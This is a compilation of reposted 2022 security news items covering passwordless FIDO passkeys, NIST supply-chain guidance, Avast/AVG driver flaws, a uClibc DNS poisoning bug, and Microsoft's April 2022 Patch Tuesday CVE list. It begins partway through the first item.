With passkeys on your mobile device, you’re able to sign in to an app or service on nearly any device, regardless of the platform or browser the device is running. For example, users can sign in on a Google Chrome browser that’s running on Microsoft Windows, using a passkey on an Apple device.

These new capabilities are expected to become available across Microsoft, Apple, and Google platforms starting in the next year. This type of Web Authentication (WebAuthn) credential represents a new era of authentication, and we’re thrilled to join the FIDO Alliance and others in the industry in supporting a common standard for a safe, consistent authentication experience. Learn more about this open-standards collaboration and exciting passwordless capabilities coming for Microsoft Azure Active Directory in a blog post from Alex Simons, Vice President, Identity Program Management.

Helping you stay secure year-round

Read more about Microsoft’s journey to provide passwordless authentication in a blog post by Joy Chik, Corporate Vice President of Identity. You can also read the complete guide to setting up your passwordless account with Microsoft, including FAQs and download links. And be sure to visit Security Insider for interviews with cybersecurity thought leaders, news on the latest cyberthreats, and lots more.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Source :
https://www.microsoft.com/security/blog/2022/05/05/this-world-password-day-consider-ditching-passwords-altogether/

NIST Releases Updated Cybersecurity Guidance for Managing Supply Chain Risks

The National Institute of Standards and Technology (NIST) on Thursday released an updated cybersecurity guidance for managing risks in the supply chain, as it increasingly emerges as a lucrative attack vector.

“It encourages organizations to consider the vulnerabilities not only of a finished product they are considering using, but also of its components — which may have been developed elsewhere — and the journey those components took to reach their destination,” NIST said in a statement.

The new directive outlines major security controls and practices that entities should adopt to identify, assess, and respond to risks at different stages of the supply chain, including the possibility of malicious functionality, flaws in third-party software, insertion of counterfeit hardware, and poor manufacturing and development practices.

The development follows an Executive Order issued by the U.S. President on “Improving the Nation’s Cybersecurity (14028)” last May, requiring government agencies to take steps to “improve the security and integrity of the software supply chain, with a priority on addressing critical software.”

It also comes as cybersecurity risks in the supply chain have come to the forefront in recent years, in part compounded by a wave of attacks targeting widely-used software to breach dozens of downstream vendors all at once.

According to the European Union Agency for Cybersecurity’s (ENISA) Threat Landscape for Supply Chain Attacks, 62% of 24 attacks documented from January 2020 to early 2021 were found to “exploit the trust of customers in their supplier.”

“Managing the cybersecurity of the supply chain is a need that is here to stay,” said NIST’s Jon Boyens and one of the publication’s authors. “If your agency or organization hasn’t started on it, this is a comprehensive tool that can take you from crawl to walk to run, and it can help you do so immediately.”

Source :
https://thehackernews.com/2022/05/nist-releases-updated-guidance-for.html

Apple, Google and Microsoft Commit to Expanded Support for FIDO Standard to Accelerate Availability of Passwordless Sign-Ins

Faster, easier and more secure sign-ins will be available to consumers across leading devices and platforms

Mountain View, California, MAY 5, 2022 – In a joint effort to make the web more secure and usable for all, Apple, Google and Microsoft today announced plans to expand support for a common passwordless sign-in standard created by the FIDO Alliance and the World Wide Web Consortium. The new capability will allow websites and apps to offer consistent, secure, and easy passwordless sign-ins to consumers across devices and platforms.

Password-only authentication is one of the biggest security problems on the web, and managing so many passwords is cumbersome for consumers, which often leads consumers to reuse the same ones across services. This practice can lead to costly account takeovers, data breaches, and even stolen identities. While password managers and legacy forms of two-factor authentication offer incremental improvements, there has been industry-wide collaboration to create sign-in technology that is more convenient and more secure.

The expanded standards-based capabilities will give websites and apps the ability to offer an end-to-end passwordless option. Users will sign in through the same action that they take multiple times each day to unlock their devices, such as a simple verification of their fingerprint or face, or a device PIN. This new approach protects against phishing and sign-in will be radically more secure when compared to passwords and legacy multi-factor technologies such as one-time passcodes sent over SMS.

An Expansion of Passwordless Standard Support

Hundreds of technology companies and service providers from around the world worked within the FIDO Alliance and W3C to create the passwordless sign-in standards that are already supported in billions of devices and all modern web browsers. Apple, Google, and Microsoft have led development of this expanded set of capabilities and are now building support into their respective platforms.

These companies’ platforms already support FIDO Alliance standards to enable passwordless sign-in on billions of industry-leading devices, but previous implementations require users to sign in to each website or app with each device before they can use passwordless functionality. Today’s announcement extends these platform implementations to give users two new capabilities for more seamless and secure passwordless sign-ins:

Allow users to automatically access their FIDO sign-in credentials (referred to by some as a “passkey”) on many of their devices, even new ones, without having to re-enroll every account.
Enable users to use FIDO authentication on their mobile device to sign in to an app or website on a nearby device, regardless of the OS platform or browser they are running.

In addition to facilitating a better user experience, the broad support of this standards-based approach will enable service providers to offer FIDO credentials without needing passwords as an alternative sign-in or account recovery method.

These new capabilities are expected to become available across Apple, Google, and Microsoft platforms over the course of the coming year.

“‘Simpler, stronger authentication’ is not just FIDO Alliance’s tagline — it also has been a guiding principle for our specifications and deployment guidelines. Ubiquity and usability are critical to seeing multi-factor authentication adopted at scale, and we applaud Apple, Google, and Microsoft for helping make this objective a reality by committing to support this user-friendly innovation in their platforms and products,” said Andrew Shikiar, executive director and CMO of the FIDO Alliance. “This new capability stands to usher in a new wave of low-friction FIDO implementations alongside the ongoing and growing utilization of security keys — giving service providers a full range of options for deploying modern, phishing-resistant authentication.”

“The standards developed by the FIDO Alliance and World Wide Web Consortium and being led in practice by these innovative companies is the type of forward-leaning thinking that will ultimately keep the American people safer online. I applaud the commitment of our private sector partners to open standards that add flexibility for the service providers and a better user experience for customers,” said Jen Easterly, Director of the U.S. Cybersecurity and Infrastructure Security Agency. “At CISA, we are working to raise the cybersecurity baseline for all Americans. Today is an important milestone in the security journey to encourage built-in security best practices and help us move beyond passwords. Cyber is a team sport, and we’re pleased to continue our collaboration.”

“Just as we design our products to be intuitive and capable, we also design them to be private and secure,” said Kurt Knight, Apple’s Senior Director of Platform Product Marketing. “Working with the industry to establish new, more secure sign-in methods that offer better protection and eliminate the vulnerabilities of passwords is central to our commitment to building products that offer maximum security and a transparent user experience — all with the goal of keeping users’ personal information safe.”

“This milestone is a testament to the collaborative work being done across the industry to increase protection and eliminate outdated password-based authentication,” said Mark Risher, Senior Director of Product Management, Google. “For Google, it represents nearly a decade of work we’ve done alongside FIDO, as part of our continued innovation towards a passwordless future. We look forward to making FIDO-based technology available across Chrome, ChromeOS, Android and other platforms, and encourage app and website developers to adopt it, so people around the world can safely move away from the risk and hassle of passwords.”

“The complete shift to a passwordless world will begin with consumers making it a natural part of their lives. Any viable solution must be safer, easier, and faster than the passwords and legacy multi-factor authentication methods used today,” says Alex Simons, Corporate Vice President, Identity Program Management at Microsoft. “By working together as a community across platforms, we can at last achieve this vision and make significant progress toward eliminating passwords. We see a bright future for FIDO-based credentials in both consumer and enterprise scenarios and will continue to build support across Microsoft apps and services.”

Available Resources:

White Paper: Multi-Device FIDO Credentials

Blog: Charting an Accelerated Path Forward for Passwordless Authentication Adoption

Webpage

About the FIDO Alliance

The FIDO (Fast IDentity Online) Alliance, www.fidoalliance.org, was formed in July 2012 to address the lack of interoperability among strong authentication technologies, and remedy the problems users face with creating and remembering multiple usernames and passwords. The FIDO Alliance is changing the nature of authentication with standards for simpler, stronger authentication that define an open, scalable, interoperable set of mechanisms that reduce reliance on passwords. FIDO Authentication is stronger, private, and easier to use when authenticating to online services.

About Apple

Apple revolutionized personal technology with the introduction of the Macintosh in 1984. Today, Apple leads the world in innovation with iPhone, iPad, Mac, Apple Watch, and Apple TV. Apple’s five software platforms — iOS, iPadOS, macOS, watchOS, and tvOS — provide seamless experiences across all Apple devices and empower people with breakthrough services including the App Store, Apple Music, Apple Pay, and iCloud. Apple’s more than 100,000 employees are dedicated to making the best products on earth, and to leaving the world better than we found it.

About Google

Google’s mission is to organize the world’s information and make it universally accessible and useful. Through products and platforms like Search, Maps, Gmail, Android, Google Play, Google Cloud, Chrome and YouTube, Google plays a meaningful role in the daily lives of billions of people and has become one of the most widely-known companies in the world. Google is a subsidiary of Alphabet Inc.

About Microsoft

Microsoft enables digital transformation for the era of an intelligent cloud and an intelligent edge. Its mission is to empower every person and every organization on the planet to achieve more.

Source :
https://fidoalliance.org/apple-google-and-microsoft-commit-to-expanded-support-for-fido-standard-to-accelerate-availability-of-passwordless-sign-ins/

Researchers Disclose Years-Old Vulnerabilities in Avast and AVG Antivirus

Two high-severity security vulnerabilities, which went undetected for several years, have been discovered in a legitimate driver that’s part of Avast and AVG antivirus solutions.

“These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded,” SentinelOne researcher Kasif Dekel said in a report shared with The Hacker News.

Tracked as CVE-2022-26522 and CVE-2022-26523, the flaws reside in a legitimate anti-rootkit kernel driver named aswArPot.sys and are said to have been introduced in Avast version 12.1, which was released in June 2016.

Specifically, the shortcomings are rooted in a socket connection handler in the kernel driver that could lead to privilege escalation by running code in the kernel from a non-administrator user, potentially causing the operating system to crash and display a blue screen of death (BSoD) error.

Vulnerabilities in Avast and AVG Antivirus

Worryingly, the flaws could also be exploited as part of a second-stage browser attack or to perform a sandbox escape, leading to far-reaching consequences.

Following responsible disclosure on December 20, 2021, Avast addressed the issues in version 22.1 of the software released on February 8, 2022. “Rootkit driver BSoD was fixed,” the company said in its release notes.

While there is no evidence that these flaws were abused in the wild, the disclosure comes merely days after Trend Micro detailed an AvosLocker ransomware attack that leveraged another issue in the same driver to terminate antivirus solutions on the compromised system.

Update: SentinelOne notes that the bug dates back to version 12.1, which it claims was released in January 2012. However, Avast’s own release notes show that version 12.1 was shipped in June 2016. We have reached out to SentinelOne for further comment, and we’ll update the story once we hear back.

Source :
https://thehackernews.com/2022/05/researchers-disclose-10-year-old.html

Unpatched DNS Related Vulnerability Affects a Wide Range of IoT Devices

Cybersecurity researchers have disclosed an unpatched security vulnerability that could pose a serious risk to IoT products.

The issue, which was originally reported in September 2021, affects the Domain Name System (DNS) implementation of two popular C libraries called uClibc and uClibc-ng that are used for developing embedded Linux systems.

uClibc is known to be used by major vendors such as Linksys, Netgear, and Axis, as well as Linux distributions like Embedded Gentoo, potentially exposing millions of IoT devices to security threats.

“The flaw is caused by the predictability of transaction IDs included in the DNS requests generated by the library, which may allow attackers to perform DNS poisoning attacks against the target device,” Giannis Tsaraias and Andrea Palanca of Nozomi Networks said in a Monday write-up.

DNS poisoning, also referred to as DNS spoofing, is the technique of corrupting a DNS resolver cache — which provides clients with the IP address associated with a domain name — with the goal of redirecting users to malicious websites.

The vulnerability in uClibc and uClibc-ng is the result of having a predictable transaction ID assigned to each DNS lookup and their static use of source port 53, effectively defeating source port randomization protections.

Successful exploitation of the bug could allow an adversary to carry out Man-in-the-Middle (MitM) attacks and corrupt the DNS cache, effectively rerouting internet traffic to a server under their control.

Nozomi Networks cautioned that the vulnerability could be trivially exploited in a reliable manner should the operating system be configured to use a fixed or predictable source port.

“The attacker could then steal and/or manipulate information transmitted by users, and perform other attacks against those devices to completely compromise them,” the researchers said.

Source :
https://thehackernews.com/2022/05/unpatched-dns-related-vulnerability.html

Microsoft April 2022 Patch Tuesday fixes 119 flaws, 2 zero-days

Today is Microsoft’s April 2022 Patch Tuesday, and with it comes fixes for two zero-day vulnerabilities and a total of 119 flaws.

Microsoft has fixed 119 vulnerabilities (not including 26 Microsoft Edge vulnerabilities) with today’s update, with ten classified as Critical as they allow remote code execution.

The number of bugs in each vulnerability category is listed below:

47 Elevation of Privilege Vulnerabilities
0 Security Feature Bypass Vulnerabilities
47 Remote Code Execution Vulnerabilities
13 Information Disclosure Vulnerabilities
9 Denial of Service Vulnerabilities
3 Spoofing Vulnerabilities
26 Edge – Chromium Vulnerabilities

For information about the non-security Windows updates, you can read about today’s Windows 10 KB5012599 and KB5012591 updates and the Windows 11 KB5012592 update.

Two zero-days fixed, one actively exploited

This month’s Patch Tuesday includes fixes for two zero-day vulnerabilities, one publicly disclosed and the other actively exploited in attacks.

Microsoft classifies a vulnerability as a zero-day if it is publicly disclosed or actively exploited with no official fix available.

The actively exploited zero-day vulnerability fixed today is a bug that security researcher Abdelhamid Naceri discovered that Microsoft previously tried to fix twice after new patch bypasses were discovered.

CVE-2022-26904 – Windows User Profile Service Elevation of Privilege Vulnerability

The publicly exposed zero-day is a privilege elevation bug discovered by CrowdStrike and the US National Security Agency (NSA).

CVE-2022-24521 – Windows Common Log File System Driver Elevation of Privilege Vulnerability

Now that Microsoft has issued patches for these vulnerabilities, it should be expected for threat actors to analyze the vulnerabilities to learn how to exploit them.

Therefore, it is strongly advised to install today’s security updates as soon as possible.

Recent updates from other companies

Other vendors who released updates in April 2022 include:

Adobe released security updates for Adobe Reader, Acrobat, Photoshop, Commerce, and After Effects.
Google released Android’s April security updates.
Cisco released security updates for numerous products this month.
VMware released security updates for multiple products.

The April 2022 Patch Tuesday Security Updates

Below is the complete list of resolved vulnerabilities and released advisories in the April 2022 Patch Tuesday updates. To access the full description of each vulnerability and the systems that it affects, you can view the full report here.

Tag	CVE ID	CVE Title	Severity
.NET Framework	CVE-2022-26832	.NET Framework Denial of Service Vulnerability	Important
Active Directory Domain Services	CVE-2022-26814	Windows DNS Server Remote Code Execution Vulnerability	Important
Active Directory Domain Services	CVE-2022-26817	Windows DNS Server Remote Code Execution Vulnerability	Important
Azure SDK	CVE-2022-26907	Azure SDK for .NET Information Disclosure Vulnerability	Important
Azure Site Recovery	CVE-2022-26898	Azure Site Recovery Remote Code Execution Vulnerability	Important
Azure Site Recovery	CVE-2022-26897	Azure Site Recovery Information Disclosure Vulnerability	Important
Azure Site Recovery	CVE-2022-26896	Azure Site Recovery Information Disclosure Vulnerability	Important
LDAP – Lightweight Directory Access Protocol	CVE-2022-26831	Windows LDAP Denial of Service Vulnerability	Important
LDAP – Lightweight Directory Access Protocol	CVE-2022-26919	Windows LDAP Remote Code Execution Vulnerability	Critical
Microsoft Bluetooth Driver	CVE-2022-26828	Windows Bluetooth Driver Elevation of Privilege Vulnerability	Important
Microsoft Dynamics	CVE-2022-23259	Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability	Critical
Microsoft Edge (Chromium-based)	CVE-2022-26909	Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability	Moderate
Microsoft Edge (Chromium-based)	CVE-2022-1139	Chromium: CVE-2022-1139 Inappropriate implementation in Background Fetch API	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-26912	Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability	Moderate
Microsoft Edge (Chromium-based)	CVE-2022-26908	Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability	Important
Microsoft Edge (Chromium-based)	CVE-2022-1146	Chromium: CVE-2022-1146 Inappropriate implementation in Resource Timing	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-26895	Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability	Important
Microsoft Edge (Chromium-based)	CVE-2022-26900	Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability	Important
Microsoft Edge (Chromium-based)	CVE-2022-26894	Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability	Important
Microsoft Edge (Chromium-based)	CVE-2022-1232	Chromium: CVE-2022-1232 Type Confusion in V8	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-26891	Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability	Important
Microsoft Edge (Chromium-based)	CVE-2022-1125	Chromium: CVE-2022-1125 Use after free in Portals	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1136	Chromium: CVE-2022-1136 Use after free in Tab Strip	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-24475	Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability	Important
Microsoft Edge (Chromium-based)	CVE-2022-1145	Chromium: CVE-2022-1145 Use after free in Extensions	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1135	Chromium: CVE-2022-1135 Use after free in Shopping Cart	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1138	Chromium: CVE-2022-1138 Inappropriate implementation in Web Cursor	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1143	Chromium: CVE-2022-1143 Heap buffer overflow in WebUI	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-24523	Microsoft Edge (Chromium-based) Spoofing Vulnerability	Moderate
Microsoft Edge (Chromium-based)	CVE-2022-1137	Chromium: CVE-2022-1137 Inappropriate implementation in Extensions	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1134	Chromium: CVE-2022-1134 Type Confusion in V8	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1127	Chromium: CVE-2022-1127 Use after free in QR Code Generator	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1128	Chromium: CVE-2022-1128 Inappropriate implementation in Web Share API	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1133	Chromium: CVE-2022-1133 Use after free in WebRTC	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1130	Chromium: CVE-2022-1130 Insufficient validation of untrusted input in WebOTP	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1129	Chromium: CVE-2022-1129 Inappropriate implementation in Full Screen Mode	Unknown
Microsoft Edge (Chromium-based)	CVE-2022-1131	Chromium: CVE-2022-1131 Use after free in Cast UI	Unknown
Microsoft Graphics Component	CVE-2022-26920	Windows Graphics Component Information Disclosure Vulnerability	Important
Microsoft Graphics Component	CVE-2022-26903	Windows Graphics Component Remote Code Execution Vulnerability	Important
Microsoft Local Security Authority Server (lsasrv)	CVE-2022-24493	Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability	Important
Microsoft Office Excel	CVE-2022-24473	Microsoft Excel Remote Code Execution Vulnerability	Important
Microsoft Office Excel	CVE-2022-26901	Microsoft Excel Remote Code Execution Vulnerability	Important
Microsoft Office SharePoint	CVE-2022-24472	Microsoft SharePoint Server Spoofing Vulnerability	Important
Microsoft Windows ALPC	CVE-2022-24482	Windows ALPC Elevation of Privilege Vulnerability	Important
Microsoft Windows ALPC	CVE-2022-24540	Windows ALPC Elevation of Privilege Vulnerability	Important
Microsoft Windows Codecs Library	CVE-2022-24532	HEVC Video Extensions Remote Code Execution Vulnerability	Important
Microsoft Windows Media Foundation	CVE-2022-24495	Windows Direct Show – Remote Code Execution Vulnerability	Important
Power BI	CVE-2022-23292	Microsoft Power BI Spoofing Vulnerability	Important
Role: DNS Server	CVE-2022-26815	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26816	Windows DNS Server Information Disclosure Vulnerability	Important
Role: DNS Server	CVE-2022-24536	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26824	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26823	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26822	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26829	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26826	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26825	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26821	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26820	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26813	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26818	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26819	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26811	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: DNS Server	CVE-2022-26812	Windows DNS Server Remote Code Execution Vulnerability	Important
Role: Windows Hyper-V	CVE-2022-22008	Windows Hyper-V Remote Code Execution Vulnerability	Critical
Role: Windows Hyper-V	CVE-2022-24490	Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability	Important
Role: Windows Hyper-V	CVE-2022-24539	Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability	Important
Role: Windows Hyper-V	CVE-2022-26785	Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability	Important
Role: Windows Hyper-V	CVE-2022-26783	Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability	Important
Role: Windows Hyper-V	CVE-2022-24537	Windows Hyper-V Remote Code Execution Vulnerability	Critical
Role: Windows Hyper-V	CVE-2022-23268	Windows Hyper-V Denial of Service Vulnerability	Important
Role: Windows Hyper-V	CVE-2022-23257	Windows Hyper-V Remote Code Execution Vulnerability	Critical
Role: Windows Hyper-V	CVE-2022-22009	Windows Hyper-V Remote Code Execution Vulnerability	Important
Skype for Business	CVE-2022-26911	Skype for Business Information Disclosure Vulnerability	Important
Skype for Business	CVE-2022-26910	Skype for Business and Lync Spoofing Vulnerability	Important
Visual Studio	CVE-2022-24767	GitHub: Git for Windows’ uninstaller vulnerable to DLL hijacking when run under the SYSTEM user account	Important
Visual Studio	CVE-2022-24765	GitHub: Uncontrolled search for the Git directory in Git for Windows	Important
Visual Studio	CVE-2022-24513	Visual Studio Elevation of Privilege Vulnerability	Important
Visual Studio Code	CVE-2022-26921	Visual Studio Code Elevation of Privilege Vulnerability	Important
Windows Ancillary Function Driver for WinSock	CVE-2022-24494	Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability	Important
Windows App Store	CVE-2022-24488	Windows Desktop Bridge Elevation of Privilege Vulnerability	Important
Windows AppX Package Manager	CVE-2022-24549	Windows AppX Package Manager Elevation of Privilege Vulnerability	Important
Windows Cluster Client Failover	CVE-2022-24489	Cluster Client Failover (CCF) Elevation of Privilege Vulnerability	Important
Windows Cluster Shared Volume (CSV)	CVE-2022-24538	Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability	Important
Windows Cluster Shared Volume (CSV)	CVE-2022-26784	Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability	Important
Windows Cluster Shared Volume (CSV)	CVE-2022-24484	Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability	Important
Windows Common Log File System Driver	CVE-2022-24521	Windows Common Log File System Driver Elevation of Privilege Vulnerability	Important
Windows Common Log File System Driver	CVE-2022-24481	Windows Common Log File System Driver Elevation of Privilege Vulnerability	Important
Windows Defender	CVE-2022-24548	Microsoft Defender Denial of Service Vulnerability	Important
Windows DWM Core Library	CVE-2022-24546	Windows DWM Core Library Elevation of Privilege Vulnerability	Important
Windows Endpoint Configuration Manager	CVE-2022-24527	Windows Endpoint Configuration Manager Elevation of Privilege Vulnerability	Important
Windows Fax Compose Form	CVE-2022-26917	Windows Fax Compose Form Remote Code Execution Vulnerability	Important
Windows Fax Compose Form	CVE-2022-26916	Windows Fax Compose Form Remote Code Execution Vulnerability	Important
Windows Fax Compose Form	CVE-2022-26918	Windows Fax Compose Form Remote Code Execution Vulnerability	Important
Windows Feedback Hub	CVE-2022-24479	Connected User Experiences and Telemetry Elevation of Privilege Vulnerability	Important
Windows File Explorer	CVE-2022-26808	Windows File Explorer Elevation of Privilege Vulnerability	Important
Windows File Server	CVE-2022-26827	Windows File Server Resource Management Service Elevation of Privilege Vulnerability	Important
Windows File Server	CVE-2022-26810	Windows File Server Resource Management Service Elevation of Privilege Vulnerability	Important
Windows Installer	CVE-2022-24499	Windows Installer Elevation of Privilege Vulnerability	Important
Windows Installer	CVE-2022-24530	Windows Installer Elevation of Privilege Vulnerability	Important
Windows iSCSI Target Service	CVE-2022-24498	Windows iSCSI Target Service Information Disclosure Vulnerability	Important
Windows Kerberos	CVE-2022-24545	Windows Kerberos Remote Code Execution Vulnerability	Important
Windows Kerberos	CVE-2022-24486	Windows Kerberos Elevation of Privilege Vulnerability	Important
Windows Kerberos	CVE-2022-24544	Windows Kerberos Elevation of Privilege Vulnerability	Important
Windows Kernel	CVE-2022-24483	Windows Kernel Information Disclosure Vulnerability	Important
Windows Local Security Authority Subsystem Service	CVE-2022-24487	Windows Local Security Authority (LSA) Remote Code Execution Vulnerability	Important
Windows Local Security Authority Subsystem Service	CVE-2022-24496	Local Security Authority (LSA) Elevation of Privilege Vulnerability	Important
Windows Media	CVE-2022-24547	Windows Digital Media Receiver Elevation of Privilege Vulnerability	Important
Windows Network File System	CVE-2022-24491	Windows Network File System Remote Code Execution Vulnerability	Critical
Windows Network File System	CVE-2022-24497	Windows Network File System Remote Code Execution Vulnerability	Critical
Windows PowerShell	CVE-2022-26788	PowerShell Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26789	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26787	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26786	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26796	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26790	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26803	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26802	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26794	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26795	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26797	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26798	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26791	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26801	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26793	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows Print Spooler Components	CVE-2022-26792	Windows Print Spooler Elevation of Privilege Vulnerability	Important
Windows RDP	CVE-2022-24533	Remote Desktop Protocol Remote Code Execution Vulnerability	Important
Windows Remote Procedure Call Runtime	CVE-2022-26809	Remote Procedure Call Runtime Remote Code Execution Vulnerability	Critical
Windows Remote Procedure Call Runtime	CVE-2022-24528	Remote Procedure Call Runtime Remote Code Execution Vulnerability	Important
Windows Remote Procedure Call Runtime	CVE-2022-24492	Remote Procedure Call Runtime Remote Code Execution Vulnerability	Important
Windows schannel	CVE-2022-26915	Windows Secure Channel Denial of Service Vulnerability	Important
Windows SMB	CVE-2022-24485	Win32 File Enumeration Remote Code Execution Vulnerability	Important
Windows SMB	CVE-2022-26830	DiskUsage.exe Remote Code Execution Vulnerability	Important
Windows SMB	CVE-2022-21983	Win32 Stream Enumeration Remote Code Execution Vulnerability	Important
Windows SMB	CVE-2022-24541	Windows Server Service Remote Code Execution Vulnerability	Critical
Windows SMB	CVE-2022-24500	Windows SMB Remote Code Execution Vulnerability	Critical
Windows SMB	CVE-2022-24534	Win32 Stream Enumeration Remote Code Execution Vulnerability	Important
Windows Telephony Server	CVE-2022-24550	Windows Telephony Server Elevation of Privilege Vulnerability	Important
Windows Upgrade Assistant	CVE-2022-24543	Windows Upgrade Assistant Remote Code Execution Vulnerability	Important
Windows User Profile Service	CVE-2022-26904	Windows User Profile Service Elevation of Privilege Vulnerability	Important
Windows Win32K	CVE-2022-24474	Windows Win32k Elevation of Privilege Vulnerability	Important
Windows Win32K	CVE-2022-26914	Win32k Elevation of Privilege Vulnerability	Important
Windows Win32K	CVE-2022-24542	Windows Win32k Elevation of Privilege Vulnerability	Important
Windows Work Folder Service	CVE-2022-26807	Windows Work Folder Service Elevation of Privilege Vulnerability	Important
YARP reverse proxy	CVE-2022-26924	YARP Denial of Service Vulnerability	Important

Source :
https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2022-patch-tuesday-fixes-119-flaws-2-zero-days/